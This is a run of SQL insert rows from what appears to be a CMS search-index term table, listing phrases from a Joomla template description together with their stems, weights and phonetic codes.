(189338, 'and fonts', 'and fonts', 0, 1, 1.3, 'A531532', 1, '*'),
(189339, 'and fonts making', 'and fonts making', 0, 1, 1.5333, 'A5315325252', 1, '*'),
(189340, 'and interactive', 'and interactive', 0, 1, 1.5, 'A53536231', 1, '*'),
(189341, 'and interactive solid', 'and interactive solid', 0, 1, 1.7, 'A53536231243', 1, '*'),
(189342, 'and light design', 'and light design', 0, 1, 1.5333, 'A5342325', 1, '*'),
(189343, 'and mouse-picked', 'and mouse-picked', 0, 1, 1.5333, 'A5352123', 1, '*'),
(189344, 'and mouse-picked textures', 'and mouse-picked textures', 0, 1, 1.8333, 'A53521232362', 1, '*'),
(189345, 'and much', 'and much', 0, 1, 1.2667, 'A5352', 1, '*'),
(189346, 'and much more', 'and much more', 0, 1, 1.4333, 'A535256', 1, '*'),
(189347, 'and much much', 'and much much', 0, 1, 1.4333, 'A535252', 1, '*'),
(189348, 'are built', 'ar built', 0, 1, 1.3, 'A6143', 1, '*'),
(189349, 'are built using', 'ar built using', 0, 1, 1.5, 'A6143252', 1, '*'),
(189350, 'at a glance', 'at a glance', 0, 1, 1.3667, 'A32452', 1, '*'),
(189351, 'backgrounds', 'background', 0, 0, 0.7333, 'B26532', 1, '*'),
(189352, 'backgrounds textures', 'background textures', 0, 1, 1.6667, 'B2653232362', 1, '*'),
(189353, 'backgrounds textures and', 'background textures and', 0, 1, 1.8, 'B265323236253', 1, '*'),
(189354, 'beulah', 'beulah', 0, 0, 0.4, 'B400', 1, '*'),
(189355, 'beulah includes', 'beulah includes', 0, 1, 1.5, 'B452432', 1, '*'),
(189356, 'beulah includes a', 'beulah includes a', 0, 1, 1.5667, 'B452432', 1, '*'),
(189357, 'blend', 'blend', 0, 0, 0.3333, 'B453', 1, '*'),
(189358, 'blend of', 'blend of', 0, 1, 1.2667, 'B4531', 1, '*'),
(189359, 'blend of bright-colors', 'blend of bright-colors', 0, 1, 1.7333, 'B45316232462', 1, '*'),
(189360, 'block', 'block', 0, 0, 0.3333, 'B420', 1, '*'),
(189361, 'block title', 'block title', 0, 1, 1.3667, 'B4234', 1, '*'),
(189362, 'block title color', 'block title color', 0, 1, 1.5667, 'B4234246', 1, '*'),
(189363, 'blockquotes', 'blockquot', 0, 0, 0.7333, 'B4232', 1, '*'),
(189364, 'blockquotes code', 'blockquot code', 0, 1, 1.5333, 'B42323', 1, '*'),
(189365, 'blockquotes code blocks', 'blockquot code blocks', 0, 1, 1.7667, 'B42323142', 1, '*'),
(189366, 'blocks', 'block', 0, 0, 0.4, 'B420', 1, '*'),
(189367, 'blocks buttons', 'block buttons', 0, 1, 1.4667, 'B421352', 1, '*'),
(189368, 'blocks buttons dropcaps', 'block buttons dropcaps', 0, 1, 1.7667, 'B421352361212', 1, '*'),
(189369, 'blog pagination', 'blog pagination', 0, 1, 1.5, 'B4212535', 1, '*'),
(189370, 'blog pagination multiple', 'blog pagination multiple', 0, 1, 1.8, 'B42125354314', 1, '*'),
(189371, 'boxes', 'box', 0, 0, 0.3333, 'B200', 1, '*'),
(189372, 'boxes tables', 'box tables', 0, 1, 1.4, 'B23142', 1, '*'),
(189373, 'boxes tables blockquotes', 'box tables blockquotes', 0, 1, 1.8, 'B2314214232', 1, '*'),
(189374, 'bright-colors', 'bright-color', 0, 0, 0.8667, 'B6232462', 1, '*'),
(189375, 'bright-colors and', 'bright-color and', 0, 1, 1.5667, 'B623246253', 1, '*'),
(189376, 'bright-colors and mouse-picked', 'bright-color and mouse-picked', 0, 1, 2, 'B62324625352123', 1, '*'),
(189377, 'browser', 'browser', 0, 0, 0.4667, 'B626', 1, '*'),
(189378, 'browser compatible', 'browser compatible', 0, 1, 1.6, 'B626251314', 1, '*'),
(189379, 'browser compatible ie7', 'browser compatible ie7', 0, 1, 1.7333, 'B626251314', 1, '*'),
(189380, 'browsers', 'browser', 0, 0, 0.5333, 'B6262', 1, '*'),
(189381, 'browsers inbuilt', 'browser inbuilt', 0, 1, 1.5333, 'B62625143', 1, '*'),
(189382, 'browsers inbuilt jquery', 'browser inbuilt jquery', 0, 1, 1.7667, 'B6262514326', 1, '*'),
(189383, 'built using', 'built using', 0, 1, 1.3667, 'B43252', 1, '*'),
(189384, 'built using html5', 'built using html5', 0, 1, 1.5667, 'B43252354', 1, '*'),
(189385, 'business or', 'busi or', 0, 1, 1.3667, 'B2526', 1, '*'),
(189386, 'business or corporate', 'busi or corporate', 0, 1, 1.7, 'B252626163', 1, '*'),
(189387, 'buttons', 'button', 0, 0, 0.4667, 'B352', 1, '*'),
(189388, 'buttons dropcaps', 'button dropcaps', 0, 1, 1.5333, 'B352361212', 1, '*'),
(189389, 'buttons dropcaps and', 'button dropcaps and', 0, 1, 1.6667, 'B35236121253', 1, '*'),
(189390, 'buttons no', 'button no', 0, 1, 1.3333, 'B3525', 1, '*'),
(189391, 'buttons no images', 'button no images', 0, 1, 1.5667, 'B35252', 1, '*'),
(189392, 'charts', 'chart', 0, 0, 0.4, 'C632', 1, '*'),
(189393, 'charts static', 'chart static', 0, 1, 1.4333, 'C63232', 1, '*'),
(189394, 'charts static and', 'chart static and', 0, 1, 1.5667, 'C6323253', 1, '*'),
(189395, 'chrome', 'chrome', 0, 0, 0.4, 'C650', 1, '*'),
(189396, 'chrome opera', 'chrome opera', 0, 1, 1.4, 'C6516', 1, '*'),
(189397, 'chrome opera safari', 'chrome opera safari', 0, 1, 1.6333, 'C6516216', 1, '*'),
(189398, 'clean and light', 'clean and light', 0, 1, 1.5, 'C453423', 1, '*'),
(189399, 'clean commented', 'clean commented', 0, 1, 1.5, 'C45253', 1, '*'),
(189400, 'clean commented code', 'clean commented code', 0, 1, 1.6667, 'C4525323', 1, '*'),
(189401, 'code', 'code', 0, 0, 0.2667, 'C300', 1, '*'),
(189402, 'code blocks', 'code blocks', 0, 1, 1.3667, 'C3142', 1, '*'),
(189403, 'code blocks buttons', 'code blocks buttons', 0, 1, 1.6333, 'C31421352', 1, '*'),
(189404, 'code with', 'code with', 0, 1, 1.3, 'C300', 1, '*'),
(189405, 'code with indents', 'code with indents', 0, 1, 1.5667, 'C353532', 1, '*'),
(189406, 'color', 'color', 0, 0, 0.3333, 'C460', 1, '*'),
(189407, 'color spans', 'color spans', 0, 1, 1.3667, 'C462152', 1, '*'),
(189408, 'color spans 404', 'color spans 404', 0, 1, 1.5, 'C462152', 1, '*'),
(189409, 'color styles', 'color styles', 0, 1, 1.4, 'C462342', 1, '*'),
(189410, 'color styles over', 'color styles over', 0, 1, 1.5667, 'C46234216', 1, '*'),
(189411, 'colors', 'color', 0, 0, 0.4, 'C462', 1, '*'),
(189412, 'colors backgrounds', 'color backgrounds', 0, 1, 1.6, 'C462126532', 1, '*'),
(189413, 'colors backgrounds textures', 'color backgrounds textures', 0, 1, 1.9, 'C46212653232362', 1, '*'),
(189414, 'columns', 'column', 0, 0, 0.4667, 'C452', 1, '*'),
(189415, 'columns get', 'column get', 0, 1, 1.3667, 'C4523', 1, '*'),
(189416, 'columns get more', 'column get more', 0, 1, 1.5333, 'C452356', 1, '*'),
(189417, 'combinations', 'combin', 0, 0, 0.8, 'C515352', 1, '*'),
(189418, 'combinations multiple', 'combin multiple', 0, 1, 1.7, 'C51535254314', 1, '*'),
(189419, 'combinations multiple widget', 'combin multiple widget', 0, 1, 1.9333, 'C51535254314323', 1, '*'),
(189420, 'commented', 'comment', 0, 0, 0.6, 'C530', 1, '*'),
(189421, 'commented code', 'comment code', 0, 1, 1.4667, 'C5323', 1, '*'),
(189422, 'commented code with', 'comment code with', 0, 1, 1.6333, 'C5323', 1, '*'),
(189423, 'compatible', 'compat', 0, 0, 0.6667, 'C51314', 1, '*'),
(189424, 'compatible ie7', 'compat ie7', 0, 1, 1.4667, 'C51314', 1, '*'),
(189425, 'compatible ie7 ie8', 'compat ie7 ie8', 0, 1, 1.6, 'C51314', 1, '*'),
(189426, 'contact form', 'contact form', 0, 1, 1.4, 'C5323165', 1, '*'),
(189427, 'contact form with', 'contact form with', 0, 1, 1.5667, 'C53231653', 1, '*'),
(189428, 'content', 'content', 0, 0, 0.4667, 'C5353', 1, '*'),
(189429, 'content boxes', 'content boxes', 0, 1, 1.4333, 'C535312', 1, '*'),
(189430, 'content boxes tables', 'content boxes tables', 0, 1, 1.6667, 'C5353123142', 1, '*'),
(189431, 'copy of abana', 'copi of abana', 0, 1, 1.4333, 'C150', 1, '*'),
(189432, 'corporate', 'corpor', 0, 0, 0.6, 'C6163', 2, '*'),
(189433, 'corporate site', 'corpor site', 0, 1, 1.4667, 'C616323', 1, '*'),
(189434, 'corporate site beulah', 'corpor site beulah', 0, 1, 1.7, 'C61632314', 1, '*'),
(189435, 'cross browser', 'cross browser', 0, 1, 1.4333, 'C621626', 1, '*'),
(189436, 'cross browser compatible', 'cross browser compatible', 0, 1, 1.8, 'C621626251314', 1, '*'),
(189437, 'css3', 'css3', 0, 0, 0.2667, 'C000', 1, '*'),
(189438, 'css3 10', 'css3 10', 0, 1, 1.2333, 'C000', 1, '*'),
(189439, 'css3 10 unique', 'css3 10 unique', 0, 1, 1.4667, 'C520', 1, '*'),
(189440, 'css3 buttons', 'css3 buttons', 0, 1, 1.4, 'C1352', 1, '*'),
(189441, 'css3 buttons no', 'css3 buttons no', 0, 1, 1.5, 'C13525', 1, '*'),
(189442, 'css3 font', 'css3 font', 0, 1, 1.3, 'C153', 1, '*'),
(189443, 'css3 font face', 'css3 font face', 0, 1, 1.4667, 'C15312', 1, '*'),
(189444, 'css3 tags', 'css3 tags', 0, 1, 1.3, 'C320', 1, '*'),
(189445, 'css3 tags with', 'css3 tags with', 0, 1, 1.4667, 'C323', 1, '*'),
(189446, 'custom', 'custom', 0, 0, 0.4, 'C350', 1, '*'),
(189447, 'custom ui', 'custom ui', 0, 1, 1.3, 'C350', 1, '*'),
(189448, 'custom ui css3', 'custom ui css3', 0, 1, 1.4667, 'C352', 1, '*'),
(189449, 'customize', 'custom', 0, 0, 0.6, 'C352', 1, '*'),
(189450, 'customize the', 'custom the', 0, 1, 1.4333, 'C3523', 1, '*'),
(189451, 'customize the overall', 'custom the overall', 0, 1, 1.7, 'C3523164', 1, '*'),
(189452, 'data', 'data', 0, 0, 0.2667, 'D000', 1, '*'),
(189453, 'data included', 'data included', 0, 1, 1.4333, 'D5243', 1, '*'),
(189454, 'data included seo', 'data included seo', 0, 1, 1.5667, 'D52432', 1, '*'),
(189455, 'demo data', 'demo data', 0, 1, 1.3, 'D530', 1, '*'),
(189456, 'demo data included', 'demo data included', 0, 1, 1.6, 'D535243', 1, '*'),
(189457, 'design', 'design', 0, 0, 0.4, 'D250', 1, '*'),
(189458, 'design using', 'design using', 0, 1, 1.4, 'D25252', 1, '*'),
(189459, 'design using a', 'design using a', 0, 1, 1.4667, 'D25252', 1, '*'),
(189460, 'documented', 'document', 0, 0, 0.6667, 'D253', 1, '*'),
(189461, 'documented enhanced', 'document enhanced', 0, 1, 1.6333, 'D253523', 1, '*'),
(189462, 'documented enhanced jquery', 'document enhanced jquery', 0, 1, 1.8667, 'D25352326', 1, '*'),
(189463, 'dropcaps', 'dropcap', 0, 0, 0.5333, 'D61212', 1, '*'),
(189464, 'dropcaps and', 'dropcap and', 0, 1, 1.4, 'D6121253', 1, '*'),
(189465, 'dropcaps and much', 'dropcap and much', 0, 1, 1.5667, 'D612125352', 1, '*'),
(189466, 'dropdown', 'dropdown', 0, 0, 0.5333, 'D6135', 1, '*'),
(189467, 'dropdown menus', 'dropdown menus', 0, 1, 1.4667, 'D61352', 1, '*'),
(189468, 'dropdown menus css3', 'dropdown menus css3', 0, 1, 1.6333, 'D61352', 1, '*'),
(189469, 'dynamic', 'dynam', 0, 0, 0.4667, 'D520', 1, '*'),
(189470, 'dynamic location', 'dynam location', 0, 1, 1.5333, 'D524235', 1, '*'),
(189471, 'dynamic location pointer', 'dynam location pointer', 0, 1, 1.8, 'D5242351536', 1, '*'),
(189472, 'e-commerce', 'e-commerc', 0, 0, 0.6667, 'E2562', 1, '*'),
(189473, 'e-commerce business', 'e-commerc business', 0, 1, 1.6333, 'E25621252', 1, '*'),
(189474, 'e-commerce business or', 'e-commerc business or', 0, 1, 1.7333, 'E256212526', 1, '*'),
(189475, 'easy for', 'easi for', 0, 1, 1.2667, 'E216', 3, '*'),
(189476, 'easy for you', 'easi for you', 0, 1, 1.4, 'E216', 2, '*'),
(189477, 'elegant', 'eleg', 0, 0, 0.4667, 'E4253', 1, '*'),
(189478, 'elegant pricing', 'eleg pricing', 0, 1, 1.5, 'E425316252', 1, '*'),
(189479, 'elegant pricing tables', 'eleg pricing tables', 0, 1, 1.7333, 'E4253162523142', 1, '*'),
(189480, 'elements', 'element', 0, 0, 0.5333, 'E4532', 1, '*'),
(189481, 'elements custom', 'element custom', 0, 1, 1.5, 'E453235', 1, '*'),
(189482, 'elements custom ui', 'element custom ui', 0, 1, 1.6, 'E453235', 1, '*'),
(189483, 'enhanced', 'enhanc', 0, 0, 0.5333, 'E523', 2, '*'),
(189484, 'enhanced jquery', 'enhanc jquery', 0, 1, 1.5, 'E52326', 1, '*'),
(189485, 'enhanced jquery integration', 'enhanc jquery integration', 0, 1, 1.9, 'E52326532635', 1, '*'),
(189486, 'error page', 'error page', 0, 1, 1.3333, 'E612', 1, '*'),
(189487, 'error page included', 'error page included', 0, 1, 1.6333, 'E6125243', 1, '*'),
(189488, 'especially for', 'especi for', 0, 1, 1.4667, 'E212416', 1, '*'),
(189489, 'especially for e-commerce', 'especi for e-commerce', 0, 1, 1.8333, 'E2124162562', 1, '*'),
(189490, 'face or', 'face or', 0, 1, 1.2333, 'F260', 1, '*'),
(189491, 'face or google', 'face or google', 0, 1, 1.4667, 'F2624', 1, '*'),
(189492, 'fallback', 'fallback', 0, 0, 0.5333, 'F412', 1, '*'),
(189493, 'fallback on', 'fallback on', 0, 1, 1.3667, 'F4125', 1, '*'),
(189494, 'fallback on older', 'fallback on older', 0, 1, 1.5667, 'F4125436', 1, '*'),
(189495, 'features', 'featur', 0, 0, 0.5333, 'F362', 1, '*'),
(189496, 'features at', 'featur at', 0, 1, 1.3667, 'F3623', 1, '*'),
(189497, 'features at a', 'featur at a', 0, 1, 1.4333, 'F3623', 1, '*'),
(189498, 'filterable', 'filter', 0, 0, 0.6667, 'F43614', 1, '*'),
(189499, 'filterable portfolio', 'filter portfolio', 0, 1, 1.6667, 'F4361416314', 1, '*'),
(189500, 'filterable portfolio sidebar', 'filter portfolio sidebar', 0, 1, 1.9333, 'F43614163142316', 1, '*'),
(189501, 'firefox', 'firefox', 0, 0, 0.4667, 'F612', 1, '*'),
(189502, 'firefox 3.6', 'firefox 3.6', 0, 1, 1.3667, 'F612', 1, '*'),
(189503, 'firefox 3.6 to', 'firefox 3.6 to', 0, 1, 1.4667, 'F6123', 1, '*'),
(189504, 'fit', 'fit', 0, 0, 0.2, 'F300', 4, '*'),
(189505, 'fit your', 'fit your', 0, 1, 1.2667, 'F360', 1, '*'),
(189506, 'fit your needs', 'fit your needs', 0, 1, 1.4667, 'F36532', 1, '*'),
(189507, 'font', 'font', 0, 0, 0.2667, 'F530', 1, '*'),
(189508, 'font face', 'font face', 0, 1, 1.3, 'F5312', 1, '*'),
(189509, 'font face or', 'font face or', 0, 1, 1.4, 'F53126', 1, '*'),
(189510, 'fonts', 'font', 0, 0, 0.3333, 'F532', 1, '*'),
(189511, 'fonts making', 'font making', 0, 1, 1.4, 'F5325252', 1, '*'),
(189512, 'fonts making it', 'font making it', 0, 1, 1.5, 'F53252523', 1, '*'),
(189513, 'fonts option', 'font option', 0, 1, 1.4, 'F532135', 1, '*'),
(189514, 'fonts option google', 'font option google', 0, 1, 1.6333, 'F53213524', 1, '*'),
(189515, 'for all kinds', 'for all kinds', 0, 1, 1.4333, 'F642532', 1, '*'),
(189516, 'for colors', 'for colors', 0, 1, 1.3333, 'F62462', 1, '*'),
(189517, 'for colors backgrounds', 'for colors backgrounds', 0, 1, 1.7333, 'F62462126532', 1, '*'),
(189518, 'for e-commerce', 'for e-commerce', 0, 1, 1.4667, 'F62562', 1, '*'),
(189519, 'for e-commerce business', 'for e-commerce business', 0, 1, 1.7667, 'F625621252', 1, '*'),
(189520, 'form elements', 'form elements', 0, 1, 1.4333, 'F654532', 1, '*'),
(189521, 'form elements custom', 'form elements custom', 0, 1, 1.6667, 'F65453235', 1, '*'),
(189522, 'form with', 'form with', 0, 1, 1.3, 'F653', 1, '*'),
(189523, 'form with validation', 'form with validation', 0, 1, 1.6667, 'F6531435', 1, '*'),
(189524, 'friendly', 'friendli', 0, 0, 0.5333, 'F6534', 1, '*'),
(189525, 'friendly and', 'friendli and', 0, 1, 1.4, 'F653453', 1, '*'),
(189526, 'friendly and much', 'friendli and much', 0, 1, 1.5667, 'F65345352', 1, '*'),
(189527, 'get more', 'get more', 0, 1, 1.2667, 'G356', 1, '*'),
(189528, 'get more styles', 'get more styles', 0, 1, 1.5, 'G3562342', 1, '*'),
(189529, 'glance', 'glanc', 0, 0, 0.4, 'G452', 1, '*'),
(189530, 'glance are', 'glanc are', 0, 1, 1.3333, 'G4526', 1, '*'),
(189531, 'glance are built', 'glanc are built', 0, 1, 1.5333, 'G4526143', 1, '*'),
(189532, 'google', 'googl', 0, 0, 0.4, 'G400', 1, '*'),
(189533, 'google charts', 'googl charts', 0, 1, 1.4333, 'G42632', 1, '*'),
(189534, 'google charts static', 'googl charts static', 0, 1, 1.6667, 'G4263232', 1, '*'),
(189535, 'google fonts', 'googl fonts', 0, 1, 1.4, 'G41532', 1, '*'),
(189536, 'google fonts option', 'googl fonts option', 0, 1, 1.6333, 'G41532135', 1, '*'),
(189537, 'google map', 'googl map', 0, 1, 1.3333, 'G451', 1, '*'),
(189538, 'google map integration', 'googl map integration', 0, 1, 1.7333, 'G451532635', 1, '*'),
(189539, 'here clean', 'here clean', 0, 1, 1.3333, 'H6245', 1, '*'),
(189540, 'here clean commented', 'here clean commented', 0, 1, 1.6667, 'H6245253', 1, '*'),
(189541, 'html', 'html', 0, 0, 0.2667, 'H354', 1, '*'),
(189542, 'html pages', 'html pages', 0, 1, 1.3333, 'H35412', 1, '*'),
(189543, 'html pages included', 'html pages included', 0, 1, 1.6333, 'H354125243', 1, '*'),
(189544, 'html5', 'html5', 0, 0, 0.3333, 'H354', 1, '*'),
(189545, 'html5 css3', 'html5 css3', 0, 1, 1.3333, 'H3542', 1, '*'),
(189546, 'html5 css3 10', 'html5 css3 10', 0, 1, 1.4333, 'H3542', 1, '*'),
(189547, 'ie7', 'ie7', 0, 0, 0.2, 'I000', 1, '*'),
(189548, 'ie7 ie8', 'ie7 ie8', 0, 1, 1.2333, 'I000', 1, '*'),
(189549, 'ie7 ie8 ie9', 'ie7 ie8 ie9', 0, 1, 1.3667, 'I000', 1, '*'),
(189550, 'ie8', 'ie8', 0, 0, 0.2, 'I000', 1, '*'),
(189551, 'ie8 ie9', 'ie8 ie9', 0, 1, 1.2333, 'I000', 1, '*'),
(189552, 'ie8 ie9 firefox', 'ie8 ie9 firefox', 0, 1, 1.5, 'I1612', 1, '*'),
(189553, 'ie9', 'ie9', 0, 0, 0.2, 'I000', 1, '*'),
(189554, 'ie9 firefox', 'ie9 firefox', 0, 1, 1.3667, 'I1612', 1, '*'),
(189555, 'ie9 firefox 3.6', 'ie9 firefox 3.6', 0, 1, 1.5, 'I1612', 1, '*'),
(189556, 'images used', 'imag used', 0, 1, 1.3667, 'I523', 1, '*'),
(189557, 'images used css3', 'imag used css3', 0, 1, 1.5333, 'I5232', 1, '*'),
(189558, 'inbuilt', 'inbuilt', 0, 0, 0.4667, 'I5143', 1, '*'),
(189559, 'inbuilt jquery', 'inbuilt jquery', 0, 1, 1.4667, 'I514326', 1, '*'),
(189560, 'inbuilt jquery slider', 'inbuilt jquery slider', 0, 1, 1.7, 'I5143262436', 1, '*'),
(189561, 'included', 'includ', 0, 0, 0.5333, 'I5243', 1, '*'),
(189562, 'included 10', 'includ 10', 0, 1, 1.3667, 'I5243', 1, '*'),
(189563, 'included 10 preset', 'includ 10 preset', 0, 1, 1.6, 'I52431623', 1, '*'),
(189564, 'included 6', 'includ 6', 0, 1, 1.3333, 'I5243', 1, '*'),
(189565, 'included 6 sliders', 'includ 6 sliders', 0, 1, 1.6, 'I524324362', 1, '*'),
(189566, 'included seo', 'includ seo', 0, 1, 1.4, 'I52432', 1, '*'),
(189567, 'included seo friendly', 'includ seo friendly', 0, 1, 1.7, 'I5243216534', 1, '*'),
(189568, 'included well', 'includ well', 0, 1, 1.4333, 'I52434', 1, '*'),
(189569, 'included well documented', 'includ well documented', 0, 1, 1.8, 'I524343253', 1, '*'),
(189570, 'includes', 'includ', 0, 0, 0.5333, 'I52432', 1, '*'),
(189571, 'includes a', 'includ a', 0, 1, 1.3333, 'I52432', 1, '*'),
(189572, 'includes a variety', 'includ a variety', 0, 1, 1.6, 'I52432163', 1, '*'),
(189573, 'indents', 'indent', 0, 0, 0.4667, 'I53532', 1, '*'),
(189574, 'indents form', 'indent form', 0, 1, 1.4, 'I53532165', 1, '*'),
(189575, 'indents form elements', 'indent form elements', 0, 1, 1.7, 'I535321654532', 1, '*'),
(189576, 'integration', 'integr', 0, 0, 0.7333, 'I532635', 1, '*'),
(189577, 'integration cross', 'integr cross', 0, 1, 1.5667, 'I532635262', 1, '*'),
(189578, 'integration cross browser', 'integr cross browser', 0, 1, 1.8333, 'I5326352621626', 1, '*'),
(189579, 'integration with', 'integr with', 0, 1, 1.5333, 'I5326353', 1, '*'),
(189580, 'integration with dynamic', 'integr with dynamic', 0, 1, 1.8, 'I532635352', 1, '*'),
(189581, 'interactive', 'interact', 0, 0, 0.7333, 'I536231', 1, '*'),
(189582, 'interactive solid', 'interact solid', 0, 1, 1.5667, 'I536231243', 1, '*'),
(189583, 'interactive solid typography', 'interact solid typography', 0, 1, 1.9333, 'I5362312431261', 1, '*'),
(189584, 'is a clean', 'is a clean', 0, 1, 1.3333, 'I245', 1, '*'),
(189585, 'it easy', 'it easy', 0, 1, 1.2333, 'I320', 2, '*'),
(189586, 'it easy for', 'it easy for', 0, 1, 1.3667, 'I3216', 2, '*'),
(189587, 'it suitable', 'it suitable', 0, 1, 1.3667, 'I32314', 1, '*'),
(189588, 'it suitable for', 'it suitable for', 0, 1, 1.5, 'I3231416', 1, '*'),
(189589, 'item 3', 'item 3', 0, 1, 1.2, 'I350', 1, '*'),
(189590, 'item 3 abana', 'item 3 abana', 0, 1, 1.4, 'I3515', 1, '*'),
(189591, 'joomla', 'joomla', 0, 0, 0.4, 'J540', 1, '*'),
(189592, 'joomla template', 'joomla template', 0, 1, 1.5, 'J5435143', 1, '*'),
(189593, 'joomla template is', 'joomla template is', 0, 1, 1.6, 'J54351432', 1, '*'),
(189594, 'joomla template released', 'joomla template released', 0, 1, 1.8, 'J54351436423', 1, '*'),
(189595, 'jquery', 'jqueri', 0, 0, 0.4, 'J600', 1, '*'),
(189596, 'jquery integration', 'jqueri integration', 0, 1, 1.6, 'J6532635', 1, '*'),
(189597, 'jquery integration cross', 'jqueri integration cross', 0, 1, 1.8, 'J6532635262', 1, '*'),
(189598, 'jquery slider', 'jqueri slider', 0, 1, 1.4333, 'J62436', 1, '*'),
(189599, 'jquery slider with', 'jqueri slider with', 0, 1, 1.6, 'J624363', 1, '*'),
(189600, 'jquery tooltips', 'jqueri tooltips', 0, 1, 1.5, 'J634312', 1, '*'),
(189601, 'jquery tooltips elegant', 'jqueri tooltips elegant', 0, 1, 1.7667, 'J6343124253', 1, '*'),
(189602, 'k2 item 3', 'k2 item 3', 0, 1, 1.3, 'K350', 1, '*'),
(189603, 'kinds of websites', 'kind of websites', 0, 1, 1.5667, 'K5321232', 1, '*'),
(189604, 'layout', 'layout', 0, 0, 0.4, 'L300', 1, '*'),
(189605, 'layout combinations', 'layout combinations', 0, 1, 1.6333, 'L32515352', 1, '*'),
(189606, 'layout combinations multiple', 'layout combinations multiple', 0, 1, 1.9333, 'L3251535254314', 1, '*'),
(189607, 'light design', 'light design', 0, 1, 1.4, 'L2325', 1, '*'),
(189608, 'light design using', 'light design using', 0, 1, 1.6, 'L2325252', 1, '*'),
(189609, 'lists', 'list', 0, 0, 0.3333, 'L232', 1, '*'),
(189610, 'lists content', 'list content', 0, 1, 1.4333, 'L2325353', 1, '*'),
(189611, 'lists content boxes', 'list content boxes', 0, 1, 1.6333, 'L232535312', 1, '*'),
(189612, 'location pointer', 'locat pointer', 0, 1, 1.5333, 'L2351536', 1, '*'),
(189613, 'location pointer google', 'locat pointer google', 0, 1, 1.7667, 'L235153624', 1, '*'),
(189614, 'makes it', 'make it', 0, 1, 1.2667, 'M230', 3, '*'),
(189615, 'makes it suitable', 'make it suitable', 0, 1, 1.5667, 'M232314', 1, '*'),
(189616, 'making it', 'make it', 0, 1, 1.3, 'M2523', 1, '*'),
(189617, 'making it easy', 'make it easy', 0, 1, 1.4667, 'M25232', 1, '*'),
(189618, 'map', 'map', 0, 0, 0.2, 'M100', 1, '*'),
(189619, 'map integration', 'map integration', 0, 1, 1.5, 'M1532635', 1, '*'),
(189620, 'map integration with', 'map integration with', 0, 1, 1.6667, 'M15326353', 1, '*'),
(189621, 'menu', 'menu', 0, 0, 0.2667, 'M000', 1, '*'),
(189622, 'menu working', 'menu working', 0, 1, 1.4, 'M6252', 1, '*'),
(189623, 'menu working newsletter', 'menu working newsletter', 0, 1, 1.7667, 'M625252436', 1, '*'),
(189624, 'menus', 'menu', 0, 0, 0.3333, 'M200', 1, '*'),
(189625, 'menus css3', 'menu css3', 0, 1, 1.3333, 'M200', 1, '*'),
(189626, 'menus css3 buttons', 'menu css3 buttons', 0, 1, 1.6, 'M21352', 1, '*'),
(189627, 'more block', 'more block', 0, 1, 1.3333, 'M6142', 1, '*'),
(189628, 'more block title', 'more block title', 0, 1, 1.5333, 'M614234', 1, '*'),
(189629, 'more styles', 'more styles', 0, 1, 1.3667, 'M62342', 1, '*'),
(189630, 'more styles here', 'more styles here', 0, 1, 1.5333, 'M623426', 1, '*'),
(189631, 'mouse-picked', 'mouse-pick', 0, 0, 0.8, 'M2123', 1, '*'),
(189632, 'mouse-picked textures', 'mouse-pick textures', 0, 1, 1.7, 'M21232362', 1, '*'),
(189633, 'mouse-picked textures which', 'mouse-pick textures which', 0, 1, 1.9, 'M21232362', 1, '*'),
(189634, 'much more block', 'much more block', 0, 1, 1.5, 'M256142', 1, '*'),
(189635, 'much much', 'much much', 0, 1, 1.3, 'M252', 1, '*'),
(189636, 'much much more', 'much much more', 0, 1, 1.4667, 'M25256', 1, '*'),
(189637, 'multi-level', 'multi-level', 0, 0, 0.7333, 'M43414', 1, '*'),
(189638, 'multi-level dropdown', 'multi-level dropdown', 0, 1, 1.6667, 'M4341436135', 1, '*'),
(189639, 'multi-level dropdown menus', 'multi-level dropdown menus', 0, 1, 1.8667, 'M43414361352', 1, '*'),
(189640, 'multiple page', 'multipl page', 0, 1, 1.4333, 'M431412', 1, '*'),
(189641, 'multiple page layout', 'multipl page layout', 0, 1, 1.6667, 'M43141243', 1, '*'),
(189642, 'multiple widget', 'multipl widget', 0, 1, 1.5, 'M4314323', 1, '*'),
(189643, 'multiple widget variations', 'multipl widget variations', 0, 1, 1.8667, 'M431432316352', 1, '*'),
(189644, 'navigation', 'navig', 0, 0, 0.6667, 'N1235', 1, '*'),
(189645, 'navigation menu', 'navig menu', 0, 1, 1.5, 'N1235', 1, '*'),
(189646, 'navigation menu working', 'navig menu working', 0, 1, 1.7667, 'N12356252', 1, '*'),
(189647, 'newsletter', 'newslett', 0, 0, 0.6667, 'N2436', 1, '*'),
(189648, 'newsletter subscription', 'newslett subscription', 0, 1, 1.7667, 'N24362126135', 1, '*'),
(189649, 'newsletter subscription widget', 'newslett subscription widget', 0, 1, 2, 'N24362126135323', 1, '*'),
(189650, 'no images', 'no images', 0, 1, 1.3, 'N200', 1, '*'),
(189651, 'no images used', 'no images used', 0, 1, 1.4667, 'N230', 1, '*'),
(189652, 'of abana', 'of abana', 0, 1, 1.2667, 'O150', 1, '*'),
(189653, 'of abana joomla', 'of abana joomla', 0, 1, 1.5, 'O15254', 1, '*'),
(189654, 'of bright-colors', 'of bright-colors', 0, 1, 1.5333, 'O16232462', 1, '*'),
(189655, 'of bright-colors and', 'of bright-colors and', 0, 1, 1.6667, 'O1623246253', 1, '*'),
(189656, 'of presets', 'of presets', 0, 1, 1.3333, 'O16232', 1, '*'),
(189657, 'of presets for', 'of presets for', 0, 1, 1.4667, 'O1623216', 1, '*'),
(189658, 'of websites', 'of websites', 0, 1, 1.3667, 'O1232', 1, '*'),
(189659, 'of websites especially', 'of websites especially', 0, 1, 1.7333, 'O1232124', 1, '*'),
(189660, 'older', 'older', 0, 0, 0.3333, 'O436', 3, '*'),
(189661, 'older browsers', 'older browsers', 0, 1, 1.4667, 'O43616262', 1, '*'),
(189662, 'older browsers inbuilt', 'older browsers inbuilt', 0, 1, 1.7333, 'O436162625143', 1, '*'),
(189663, 'on older', 'on older', 0, 1, 1.2667, 'O5436', 1, '*'),
(189664, 'on older browsers', 'on older browsers', 0, 1, 1.5667, 'O543616262', 1, '*'),
(189665, 'opera', 'opera', 0, 0, 0.3333, 'O160', 1, '*'),
(189666, 'opera safari', 'opera safari', 0, 1, 1.4, 'O16216', 1, '*'),
(189667, 'opera safari working', 'opera safari working', 0, 1, 1.6667, 'O16216252', 1, '*'),
(189668, 'option', 'option', 0, 0, 0.4, 'O135', 1, '*'),
(189669, 'option google', 'option google', 0, 1, 1.4333, 'O13524', 1, '*'),
(189670, 'option google map', 'option google map', 0, 1, 1.5667, 'O1352451', 1, '*'),
(189671, 'or corporate', 'or corporate', 0, 1, 1.4, 'O626163', 1, '*'),
